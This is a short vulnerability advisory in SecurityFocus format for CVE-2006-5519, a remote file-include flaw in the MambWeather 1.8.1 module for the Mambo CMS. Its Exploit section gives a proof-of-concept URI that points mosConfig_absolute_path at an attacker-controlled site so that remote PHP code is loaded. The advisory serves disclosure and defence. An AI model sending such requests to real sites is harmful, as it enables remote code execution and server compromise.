Mambo MambWeather Module Savant2_Plugin_Options.PHP Remote File Include Vulnerability
TITLE: Mambo MambWeather Module Savant2_Plugin_Options.PHP Remote File Include Vulnerability
CLASS: Input Validation Error
CVE: CVE-2006-5519
REMOTE: Yes
LOCAL: No
PUBLISHED: Oct 22 2006 12:00AM
UPDATE: Apr 12 2007 10:51PM
CREDIT: h4ntu is credited with the discovery of this vulnerability.
VULNERABLE:
MambWeather MambWeather 1.8.1NOT VULNERABLE:
Vai alla pagina originale su Security Focus
Discussion
The Mambo MambWeather module is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
This issue affects version 1.8.1 and earlier.
Exploit
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://attacker's site
Solution
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:vuldb@securityfocus.com.
References
References:
- Mambo module MambWeather 1.8.1 (Savant2_Plugin_options.php) Remote File Inclusio (Cold z3ro)
- MambWeather Product Page (MambWeather)